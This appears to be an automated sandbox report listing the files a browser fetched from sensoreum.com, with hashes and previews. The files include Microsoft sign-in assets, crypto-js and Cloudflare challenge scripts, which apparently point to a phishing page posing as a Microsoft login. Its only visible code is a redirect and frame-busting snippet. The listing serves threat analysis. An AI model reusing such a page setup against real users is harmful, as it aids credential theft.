                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text
                                                                              Category:downloaded
                                                                              Size (bytes):1054
                                                                              Entropy (8bit):4.519130098864774
                                                                              Encrypted:false
                                                                              SSDEEP:24:hYTspFfFPzCzTzWz7DFuMjMrYR8qDXffPcLfP2Spo4N+:RpXbE/YtxfR8qDPcL2S1N+
                                                                              MD5:5D4BD9A29CF7C284A4DC5CB7CEB15148
                                                                              SHA1:3BF5F105F956CB25153E15934C552AE529B73F4A
                                                                              SHA-256:604457D973D1795946D0848CBA7A223789AAC4F76B626348182CB702E8D47F65
                                                                              SHA-512:30059324C984C0C2D143C90C8C4F729C56A3E792461E79FAF6A1D0DCAF0DCE4899B6818F5E15B140EFDF88FE9CD119168CFDA31BACE4C5BC7C62F8A77378EDAF
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://sensoreum.com/
                                                                              Preview:<!DOCTYPE html>.<html>.<head>.<title></title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">.<meta name="twitter:card" content="summary_large_image">.<meta property="og:title" content=""/>.<meta property="twitter:title" content=""/>.<meta property="og:description" content=""/>.<meta property="twitter:description" content=""/>.<meta property="og:image" content="">.<meta property="twitter:image" content="">.. <script type="application/javascript">function sleep(ms) {. .....return new Promise(resolve => setTimeout(resolve, ms));.....}. async function process() {. .await sleep(0);. if (window.location !== window.parent.location ) {. top.location = "http://sensoreum.com/";. } else {. window.location = "http://sensoreum.com/";. }. }. a.664185= 36;. window.onerror = process;.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 96 x 75, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.9052996327491467
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlct0+lohkxl/k4E08up:6v/lhPKG+lohk7Tp
                                                                              MD5:A53BEFC47548657C609C333C1D9CE3F4
                                                                              SHA1:D683BC3508A4A28A76A83C00DEFBD2598391901E
                                                                              SHA-256:FBBF7B20E43DC5F7B9FF89DAD26F76739D42C4B73E9E1BE2C232A6F14C2E4E3C
                                                                              SHA-512:ADFE2F07C013881DE21974B717292898D6D20A7ED4D9840281C7FE4658A49FCF7591D71B1328909CD5F3A3FDFFA7D19F5A196A7D732F47AC81FB8A0C3A3DBA71
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR...`...K.............IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                              Category:downloaded
                                                                              Size (bytes):5525
                                                                              Entropy (8bit):7.961202222662501
                                                                              Encrypted:false
                                                                              SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                              MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                              SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                              SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                              SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                              Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                              Category:dropped
                                                                              Size (bytes):621
                                                                              Entropy (8bit):7.673946009263606
                                                                              Encrypted:false
                                                                              SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                              MD5:4761405717E938D7E7400BB15715DB1E
                                                                              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:GIF image data, version 89a, 352 x 3
                                                                              Category:dropped
                                                                              Size (bytes):3620
                                                                              Entropy (8bit):6.867828878374734
                                                                              Encrypted:false
                                                                              SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                              MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                              SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                              SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                              SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                              Category:dropped
                                                                              Size (bytes):35170
                                                                              Entropy (8bit):7.993096534744333
                                                                              Encrypted:true
                                                                              SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                              MD5:171A4DD9400708B88724B57D62B24A6A
                                                                              SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                              SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                              SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                              Category:downloaded
                                                                              Size (bytes):17174
                                                                              Entropy (8bit):2.9129715116732746
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                              Category:downloaded
                                                                              Size (bytes):122725
                                                                              Entropy (8bit):7.997347629519925
                                                                              Encrypted:true
                                                                              SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                              MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                              SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                              SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                              SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                                              Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:1
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                              Category:dropped
                                                                              Size (bytes):122725
                                                                              Entropy (8bit):7.997347629519925
                                                                              Encrypted:true
                                                                              SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                              MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                              SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                              SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                              SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                              Category:downloaded
                                                                              Size (bytes):673
                                                                              Entropy (8bit):7.6596900876595075
                                                                              Encrypted:false
                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:GIF image data, version 89a, 352 x 3
                                                                              Category:dropped
                                                                              Size (bytes):2672
                                                                              Entropy (8bit):6.640973516071413
                                                                              Encrypted:false
                                                                              SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                              MD5:166DE53471265253AB3A456DEFE6DA23
                                                                              SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                              SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                              SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):96
                                                                              Entropy (8bit):5.218997042938778
                                                                              Encrypted:false
                                                                              SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                              MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                              SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                              SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                              SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                              Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48120)
                                                                              Category:downloaded
                                                                              Size (bytes):48121
                                                                              Entropy (8bit):5.399559475473033
                                                                              Encrypted:false
                                                                              SSDEEP:768:1CbU/4ruPh5qaq75KvO8fV9/KFHk7z6ybMJhTBsgVX2GwDBsjY1L8ep7K1oiSJvU:QruPh5qaq7gGwV9ygWyb42GQsp
                                                                              MD5:240198B7133FAF43160703113AA2F601
                                                                              SHA1:AB61FEDDAE321268BD84839B8908E611E9300AFD
                                                                              SHA-256:401258036014BCC401F7894FD5ACC7D6BA31CDF3162C1D55EBB219D908BCF496
                                                                              SHA-512:F49972AE131DE7EE33D86472471237580A1055C2E086BE0266E7171CB9C423A99145B006CF5D25E25288E64440430E43782E976BF7EC117BDAA52E5D370AB139
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/g/672eb098a9f3/api.js
                                                                              Preview:"use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Bt(l,o,c,g,h,"next",s)}function h(s){Bt(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48120)
                                                                              Category:dropped
                                                                              Size (bytes):48121
                                                                              Entropy (8bit):5.399559475473033
                                                                              Encrypted:false
                                                                              SSDEEP:768:1CbU/4ruPh5qaq75KvO8fV9/KFHk7z6ybMJhTBsgVX2GwDBsjY1L8ep7K1oiSJvU:QruPh5qaq7gGwV9ygWyb42GQsp
                                                                              MD5:240198B7133FAF43160703113AA2F601
                                                                              SHA1:AB61FEDDAE321268BD84839B8908E611E9300AFD
